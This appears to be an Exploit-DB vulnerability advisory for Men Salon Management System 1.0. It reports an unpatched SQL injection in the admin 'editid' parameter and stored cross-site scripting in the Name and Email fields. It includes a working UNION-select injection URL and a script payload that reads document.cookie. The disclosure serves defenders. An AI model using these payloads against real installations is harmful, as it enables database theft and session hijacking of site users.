Men Salon Management System 1.0 - Multiple Vulnerabilities

vendor:

Men Salon Management System

by:

Aryan Chehreghani

9,8

CVSS

HIGH

SQL Injection & Stored Cross-Site Scripting

89 (SQL Injection) & 79 (XSS)

CWE

Product Name: Men Salon Management System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:phpgurukul:men_salon_management_system

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 10 - XAMPP Server

2021

Men Salon Management System 1.0 – Multiple Vulnerabilities

The editid parameter is vulnerable to SQL injection and the Name and Email fields are vulnerable to stored cross-site scripting.

Mitigation:

Input validation and sanitization should be implemented to prevent SQL injection and XSS attacks.

Source

Exploit-DB raw data:

# Exploit Title: Men Salon Management System 1.0 - Multiple Vulnerabilities
# Date: 2021-09-09
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql
# Version: 1.0
# Tested on: Windows 10 - XAMPP Server

# Vulnerable page :
http://localhost/msms/admin/edit-customer-detailed.php?editid=

# Proof Of Concept :
# 1 . Download And install [ Men Salon Management System ]
# 2 . Go to /msms/admin/index.php and Enter Username & Password
# 3 . Navigate to >> Customer List 
# 4 . In the action column, click Edit 
# 5 . Enter the payload into the Url and Fields

# [ Sql Injection ] :

Vulnerable paramater :
The editid paramater is Vulnerable to sqli

GET : http://localhost/msms/admin/edit-customer-detailed.php?editid=2'+union+select+1,database(),3,4,5,6,7,8--+

# [ Stored Cross-Site Scripting ] : 

Vulnerable Fields : Name & Email

Payload Used: "><script>alert(document.cookie)</script>